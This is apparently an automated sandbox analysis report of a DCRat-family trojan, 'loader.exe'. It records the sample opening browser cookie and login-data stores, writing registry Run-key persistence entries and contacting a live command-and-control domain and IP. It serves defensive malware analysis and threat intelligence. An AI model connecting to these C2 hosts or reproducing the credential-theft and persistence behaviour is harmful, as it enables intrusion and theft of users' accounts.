                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Login DataJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior

                                    Remote Access Functionality

Source: Yara match, File source: 00000011.00000002.3435800974.0000000003CBC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000011.00000002.3435800974.00000000037B4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000002.2357344463.0000000012B88000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000011.00000002.3435800974.00000000039DF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: chainPorthostCommon.exe PID: 2308, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: RuntimeBroker.exe PID: 6008, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: dasHost.exe PID: 3404, type: MEMORYSTR
Source: Yara match, File source: loader.exe, type: SAMPLE
Source: Yara match, File source: 0.3.loader.exe.5d2d70d.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.3.loader.exe.74d170d.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 5.0.chainPorthostCommon.exe.4b0000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.3.loader.exe.5d2d70d.1.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.3.loader.exe.74d170d.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000000.00000003.2162490833.0000000005BE3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000003.2161189771.0000000007387000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000000.2286038382.00000000004B2000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match, File source: C:\Windows\DiagTrack\Scenarios\dasHost.exe, type: DROPPED
Source: Yara match, File source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exe, type: DROPPED
Source: Yara match, File source: C:\Program Files (x86)\Microsoft\csrss.exe, type: DROPPED
Source: Yara match, File source: C:\Recovery\conhost.exe, type: DROPPED
Source: Yara match, File source: C:\Windows\LiveKernelReports\RuntimeBroker.exe, type: DROPPED
Source: Yara match, File source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exe, type: DROPPED
| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | 11 Scripting | Valid Accounts | 141 Windows Management Instrumentation | 11 Scripting | 1 Exploitation for Privilege Escalation | 1 Disable or Modify Tools | 1 OS Credential Dumping | 3 File and Directory Discovery | 1 Taint Shared Content | 1 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
| Credentials | Domains | Default Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 145 System Information Discovery | Remote Desktop Protocol | 1 Data from Local System | 2 Non-Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | At | 31 Registry Run Keys / Startup Folder | 12 Process Injection | 3 Obfuscated Files or Information | Security Account Manager | 541 Security Software Discovery | SMB/Windows Admin Shares | 1 Clipboard Data | 12 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 31 Registry Run Keys / Startup Folder | 14 Software Packing | NTDS | 2 Process Discovery | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 471 Virtualization/Sandbox Evasion | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 File Deletion | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 232 Masquerading | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
| Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 471 Virtualization/Sandbox Evasion | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
| Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 12 Process Injection | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
[Behavior graph: Behavior Graph ID: 1588885, Sample: loader.exe, Startdate: 11/01/2025, Architecture: WINDOWS, Score: 100]

| Source | Detection | Scanner | Label |
|---|---|---|---|
| loader.exe | 76% | Virustotal | |
| loader.exe | 68% | ReversingLabs | Win32.Trojan.DCRat |
| loader.exe | 100% | Avira | VBS/Runner.VPG |
| loader.exe | 100% | Joe Sandbox ML | |
| Source | Detection | Scanner | Label |
|---|---|---|---|
| C:\Users\user\Desktop\SSuSBQke.log | 100% | Avira | TR/AVI.Agent.updqb |
| C:\Users\user\Desktop\JgiUHXBa.log | 100% | Avira | TR/PSW.Agent.qngqt |
| C:\Users\user\Desktop\pOvooSqL.log | 100% | Avira | TR/AVI.Agent.updqb |
| C:\ServerWinRuntimeBroker\OAKCwEsKnudXsAgphVRYMDBaoP2ZIjCO6J5QYyd0q81GMNjCqOkwlC1.vbe | 100% | Avira | VBS/Runner.VPG |
| C:\Windows\DiagTrack\Scenarios\dasHost.exe | 100% | Avira | HEUR/AGEN.1323342 |
| C:\Users\user\AppData\Local\Temp\HArqwkOZhw.bat | 100% | Avira | BAT/Delbat.C |
| C:\Recovery\conhost.exe | 100% | Avira | HEUR/AGEN.1323342 |
| C:\ServerWinRuntimeBroker\chainPorthostCommon.exe | 100% | Avira | HEUR/AGEN.1323342 |
| C:\Program Files (x86)\Microsoft\csrss.exe | 100% | Avira | HEUR/AGEN.1323342 |
| C:\Windows\LiveKernelReports\RuntimeBroker.exe | 100% | Avira | HEUR/AGEN.1323342 |
| C:\Users\user\Desktop\keVXUmFt.log | 100% | Avira | TR/PSW.Agent.qngqt |
| C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exe | 100% | Avira | HEUR/AGEN.1323342 |
| C:\Users\user\Desktop\JgiUHXBa.log | 100% | Joe Sandbox ML | |
| C:\Users\user\Desktop\ZPhRdffT.log | 100% | Joe Sandbox ML | |
| C:\Windows\System32\SecurityHealthSystray.exe | 100% | Joe Sandbox ML | |
| C:\Windows\DiagTrack\Scenarios\dasHost.exe | 100% | Joe Sandbox ML | |
| C:\Recovery\conhost.exe | 100% | Joe Sandbox ML | |
| C:\ServerWinRuntimeBroker\chainPorthostCommon.exe | 100% | Joe Sandbox ML | |
| C:\Program Files (x86)\Microsoft\csrss.exe | 100% | Joe Sandbox ML | |
| C:\Users\user\Desktop\OTzTkTQO.log | 100% | Joe Sandbox ML | |
| C:\Windows\LiveKernelReports\RuntimeBroker.exe | 100% | Joe Sandbox ML | |
| C:\Users\user\Desktop\keVXUmFt.log | 100% | Joe Sandbox ML | |
| C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exe | 100% | Joe Sandbox ML | |
| C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | 100% | Joe Sandbox ML | |
| C:\Program Files (x86)\Microsoft\csrss.exe | 83% | ReversingLabs | ByteCode-MSIL.Trojan.Whispergate |
| C:\Recovery\conhost.exe | 83% | ReversingLabs | ByteCode-MSIL.Trojan.Whispergate |
| C:\ServerWinRuntimeBroker\chainPorthostCommon.exe | 83% | ReversingLabs | ByteCode-MSIL.Trojan.Whispergate |
| C:\Users\user\Desktop\BLdnhdFQ.log | 38% | ReversingLabs | ByteCode-MSIL.Trojan.Generic |
| C:\Users\user\Desktop\JgiUHXBa.log | 71% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
| C:\Users\user\Desktop\OTzTkTQO.log | 8% | ReversingLabs | |
| C:\Users\user\Desktop\PHEbWhMM.log | 25% | ReversingLabs | |
| C:\Users\user\Desktop\SSuSBQke.log | 50% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
| C:\Users\user\Desktop\XCTiUwVw.log | 38% | ReversingLabs | ByteCode-MSIL.Trojan.Generic |
| C:\Users\user\Desktop\ZPhRdffT.log | 8% | ReversingLabs | |
| C:\Users\user\Desktop\keVXUmFt.log | 71% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
| C:\Users\user\Desktop\kmFpzVgz.log | 25% | ReversingLabs | |
| C:\Users\user\Desktop\pOvooSqL.log | 50% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
| C:\Windows\DiagTrack\Scenarios\dasHost.exe | 83% | ReversingLabs | ByteCode-MSIL.Trojan.Whispergate |
| C:\Windows\LiveKernelReports\RuntimeBroker.exe | 83% | ReversingLabs | ByteCode-MSIL.Trojan.Whispergate |
| C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exe | 83% | ReversingLabs | ByteCode-MSIL.Trojan.Whispergate |
                                    No Antivirus matches
                                    No Antivirus matches
| Source | Detection | Scanner | Label |
|---|---|---|---|
| http://373292cm.nyP | 0% | Avira URL Cloud | safe |
| http://373292cm.nyashka.top/JavascriptSecureSqlLocalTemporary.php | 0% | Avira URL Cloud | safe |
| http://373292cm.nyPR | 0% | Avira URL Cloud | safe |
| http://373292cm.nyashka.top | 0% | Avira URL Cloud | safe |
| http://373292cm.nyashka.top/ | 0% | Avira URL Cloud | safe |
| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| 373292cm.nyashka.top | 37.44.238.250 | true | true | | unknown |

| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| http://373292cm.nyashka.top/JavascriptSecureSqlLocalTemporary.php | true | Avira URL Cloud: safe | unknown |
                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://ac.ecosia.org/autocomplete?q=RuntimeBroker.exe, 00000011.00000002.3463672667.00000000149BB000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013648000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.00000000145EB000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013B63000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014183000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013939000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013ACB000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014922000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.000000001473A000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014552000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013E4B000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014B0A000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014BA3000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.000000001421B000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.00000000147D3000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013DB3000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.000000001436B000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 
00000011.00000002.3463672667.0000000014033000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013F9B000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014403000.00000004.00000800.00020000.00000000.sdmp, ILsVoJuzGv.17.drfalse
                                        high
https://duckduckgo.com/chrome_newtab | Source: RuntimeBroker.exe, ILsVoJuzGv.17.dr | Malicious: false | Reputation: high
https://duckduckgo.com/ac/?q= | Source: RuntimeBroker.exe, ILsVoJuzGv.17.dr | Malicious: false | Reputation: high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | Source: RuntimeBroker.exe, ILsVoJuzGv.17.dr | Malicious: false | Reputation: high
http://373292cm.nyashka.top | Source: RuntimeBroker.exe | Malicious: true | Avira URL Cloud: safe | Reputation: unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | Source: RuntimeBroker.exe, ILsVoJuzGv.17.dr | Malicious: false | Reputation: high
http://www.enigmaprotector.com/openU | Source: loader.exe | Malicious: false | Reputation: high
http://373292cm.nyP | Source: RuntimeBroker.exe | Malicious: false | Avira URL Cloud: safe | Reputation: unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | Source: RuntimeBroker.exe, ILsVoJuzGv.17.dr | Malicious: false | Reputation: high
http://373292cm.nyashka.top/ | Source: RuntimeBroker.exe | Malicious: true | Avira URL Cloud: safe | Reputation: unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | Source: RuntimeBroker.exe, ILsVoJuzGv.17.dr | Malicious: false | Reputation: high
http://373292cm.nyPR | Source: RuntimeBroker.exe | Malicious: false | Avira URL Cloud: safe | Reputation: unknown
http://www.enigmaprotector.com/ | Source: loader.exe | Malicious: false | Reputation: high
https://www.ecosia.org/newtab/ | Source: RuntimeBroker.exe, ILsVoJuzGv.17.dr | Malicious: false | Reputation: high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | Source: chainPorthostCommon.exe, RuntimeBroker.exe | Malicious: false | Reputation: high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | Source: RuntimeBroker.exe, ILsVoJuzGv.17.dr | Malicious: false | Reputation: high
IP | Domain | Country | ASN | ASN Name | Malicious
37.44.238.250 | 373292cm.nyashka.top | France | 49434 | HARMONYHOSTING-ASFR | true
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1588885
Start date and time: 2025-01-11 06:41:52 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 46s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 27
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: loader.exe
Detection: MAL
Classification: mal100.spre.troj.spyw.expl.evad.winEXE@35/291@2/1
EGA Information:
• Successful, ratio: 20%
HCA Information: Failed
                                                              Cookbook Comments:
                                                              • Found application associated with file extension: .exe
                                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                              • Excluded IPs from analysis (whitelisted): 13.107.246.45, 20.109.210.53, 184.28.90.27
                                                              • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                              • Execution Graph export aborted for target RuntimeBroker.exe, PID 6008 because it is empty
                                                              • Execution Graph export aborted for target chainPorthostCommon.exe, PID 2884 because it is empty
                                                              • Execution Graph export aborted for target conhost.exe, PID 1488 because it is empty
                                                              • Execution Graph export aborted for target conhost.exe, PID 4024 because it is empty
                                                              • Execution Graph export aborted for target dasHost.exe, PID 3404 because it is empty
                                                              • Execution Graph export aborted for target dasHost.exe, PID 5872 because it is empty
                                                              • Execution Graph export aborted for target tQESKTdysPpsVzUyXTE.exe, PID 2360 because it is empty
                                                              • Execution Graph export aborted for target tQESKTdysPpsVzUyXTE.exe, PID 5132 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                              • Report size getting too big, too many NtCreateFile calls found.
                                                              • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                              • Report size getting too big, too many NtOpenFile calls found.
                                                              • Report size getting too big, too many NtOpenKey calls found.
                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                              • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                              • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
00:43:14 | API Interceptor | 370991x Sleep call for process: RuntimeBroker.exe modified
06:43:09 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Windows\LiveKernelReports\RuntimeBroker.exe"
06:43:19 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run csrss "C:\Program Files (x86)\microsoft\csrss.exe"
06:43:31 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run dasHost "C:\Windows\DiagTrack\Scenarios\dasHost.exe"
06:43:39 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run conhost "C:\Recovery\conhost.exe"
06:43:47 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run tQESKTdysPpsVzUyXTE "C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exe"
06:43:55 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run chainPorthostCommon "C:\ServerWinRuntimeBroker\chainPorthostCommon.exe"
06:44:04 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Windows\LiveKernelReports\RuntimeBroker.exe"
06:44:12 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run csrss "C:\Program Files (x86)\microsoft\csrss.exe"
06:44:20 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run dasHost "C:\Windows\DiagTrack\Scenarios\dasHost.exe"
06:44:28 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run conhost "C:\Recovery\conhost.exe"
06:44:37 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run tQESKTdysPpsVzUyXTE "C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exe"
06:44:45 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run chainPorthostCommon "C:\ServerWinRuntimeBroker\chainPorthostCommon.exe"
06:44:53 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Windows\LiveKernelReports\RuntimeBroker.exe"
06:45:02 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run csrss "C:\Program Files (x86)\microsoft\csrss.exe"
Match | Associated Sample Name / URL | Detection | Threat Name | Context
37.44.238.250 | PlZA6b48MW.exe | malicious | DCRat, PureLog Stealer, zgRAT | 505905cm.n9shka.top/imagePollLinuxCentral.php
37.44.238.250 | r6cRyCpdfS.exe | malicious | DCRat, PureLog Stealer, zgRAT | 321723cm.renyash.ru/AuthdbBasetraffic.php
37.44.238.250 | cbCjTbodwa.exe | malicious | DCRat, PureLog Stealer, zgRAT | whware.top/RequestLowGeoLongpollWordpress.php
37.44.238.250 | vb8DOBZQ4X.exe | malicious | DCRat, PureLog Stealer, zgRAT | 228472cm.n9shka.top/PhpauthGamelongpollBigloadbaseLinuxWindowstrackDatalife.php
37.44.238.250 | 8k1e14tjcx.exe | malicious | DCRat, PureLog Stealer, zgRAT | 703648cm.renyash.top/provider_cpugame.php
37.44.238.250 | 4si9noTBNw.exe | malicious | DCRat, PureLog Stealer, zgRAT | 306039cm.nyashcrack.top/geoGeneratorwordpresswpprivatetempDownloads.php
37.44.238.250 | Qsi7IgkrWa.exe | malicious | DCRat, PureLog Stealer, zgRAT | 595506cm.n9shka.top/BigloadgeneratortraffictestDatalifeTemp.php
37.44.238.250 | 4Awb1u1GcJ.exe | malicious | DCRat, PureLog Stealer, zgRAT | 143840cm.nyashteam.ru/DefaultPublic.php
37.44.238.250 | s5duotgoYD.exe | malicious | DCRat, PureLog Stealer, zgRAT | 500154cm.n9shteam.in/eternallineHttpprocessorwindowsDatalifedleprivatecentral.php
37.44.238.250 | QMT2731i8k.exe | malicious | DCRat | 117813cm.n9shteam.in/ExternalRequest.php
Match | Associated Sample Name / URL | Detection | Threat Name | Context
373292cm.nyashka.top | fluent.exe | malicious | DCRat, PureLog Stealer, zgRAT | 80.211.144.156
373292cm.nyashka.top | Internal.exe | malicious | DCRat, PureLog Stealer, zgRAT | 80.211.144.156
373292cm.nyashka.top | Fatality.exe | malicious | DCRat, PureLog Stealer, zgRAT | 80.211.144.156
373292cm.nyashka.top | Nerolore.exe | malicious | DCRat, PureLog Stealer, zgRAT | 80.211.144.156
373292cm.nyashka.top | jW5TA1J9Z1.exe | malicious | DCRat, PureLog Stealer, zgRAT | 80.211.144.156
                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              HARMONYHOSTING-ASFRPlZA6b48MW.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                              • 37.44.238.250
                                                              r6cRyCpdfS.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                              • 37.44.238.250
                                                              cbCjTbodwa.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                              • 37.44.238.250
                                                              vb8DOBZQ4X.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                              • 37.44.238.250
                                                              dlr.arm7.elfGet hashmaliciousMiraiBrowse
                                                              • 37.44.238.94
                                                              dlr.mips.elfGet hashmaliciousMiraiBrowse
